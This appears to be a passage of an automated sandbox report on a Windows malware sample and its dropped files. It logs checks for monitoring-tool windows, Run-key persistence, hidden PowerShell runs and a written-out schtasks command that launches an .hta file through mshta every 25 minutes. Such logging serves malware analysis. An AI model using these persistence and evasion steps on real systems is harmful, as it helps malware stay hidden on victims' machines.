                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXEWindow searched: window name: FilemonClass
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXEWindow searched: window name: PROCMON_WINDOW_CLASS
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClass
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: RegmonClass
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClass
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: Regmonclass
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: Filemonclass
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeWindow searched: window name: FilemonClass
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeWindow searched: window name: RegmonClass
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeWindow searched: window name: FilemonClass
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeWindow searched: window name: Regmonclass
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeWindow searched: window name: Filemonclass
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                                Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exeWindow searched: window name: FilemonClass
                                                Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                                Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exeWindow searched: window name: RegmonClass
                                                Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exeWindow searched: window name: FilemonClass
                                                Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeWindow searched: window name: FilemonClass
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeWindow searched: window name: RegmonClass
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeWindow searched: window name: FilemonClass
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeWindow searched: window name: Regmonclass
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeWindow searched: window name: Filemonclass
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeWindow searched: window name: Regmonclass
                                                Source: C:\ProgramData\jnxnee\benskvi.exeWindow searched: window name: FilemonClass
                                                Source: C:\ProgramData\jnxnee\benskvi.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                                Source: C:\ProgramData\jnxnee\benskvi.exeWindow searched: window name: RegmonClass
                                                Source: C:\ProgramData\jnxnee\benskvi.exeWindow searched: window name: FilemonClass
                                                Source: C:\ProgramData\jnxnee\benskvi.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                                Source: C:\ProgramData\jnxnee\benskvi.exeWindow searched: window name: Regmonclass
                                                Source: C:\ProgramData\jnxnee\benskvi.exeWindow searched: window name: Filemonclass
                                                Source: C:\ProgramData\jnxnee\benskvi.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                                Source: C:\ProgramData\jnxnee\benskvi.exeWindow searched: window name: Regmonclass
                                                Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXEWindow searched: window name: FilemonClass
                                                Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXEWindow searched: window name: PROCMON_WINDOW_CLASS
                                                Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXEWindow searched: window name: RegmonClass
                                                Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXEWindow searched: window name: FilemonClass
                                                Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXEWindow searched: window name: PROCMON_WINDOW_CLASS
                                                Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXEWindow searched: window name: FilemonClass
                                                Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXEWindow searched: window name: PROCMON_WINDOW_CLASS
                                                Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXEWindow searched: window name: RegmonClass
                                                Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXEWindow searched: window name: FilemonClass
                                                Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXEWindow searched: window name: PROCMON_WINDOW_CLASS
                                                Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeWindow searched: window name: FilemonClass
                                                Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                                Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeWindow searched: window name: RegmonClass
                                                Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeWindow searched: window name: FilemonClass
                                                Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                                Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeWindow searched: window name: Regmonclass
                                                Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeWindow searched: window name: Filemonclass
                                                Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                                Uses schtasks.exe or at.exe to add and modify task schedules
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn bseb5ma1dDD /tr "mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta" /sc minute /mo 25 /ru "user" /f
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXEFile created: C:\Windows\Tasks\rapes.jobJump to behavior
                                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
                                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
                                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
                                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
                                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
                                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
                                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 132fd7f0ed.exe
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 132fd7f0ed.exe
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C2F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00C2F98E
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00CA1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00CA1C41
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeCode function: 20_2_00BD918F GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,20_2_00BD918F
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
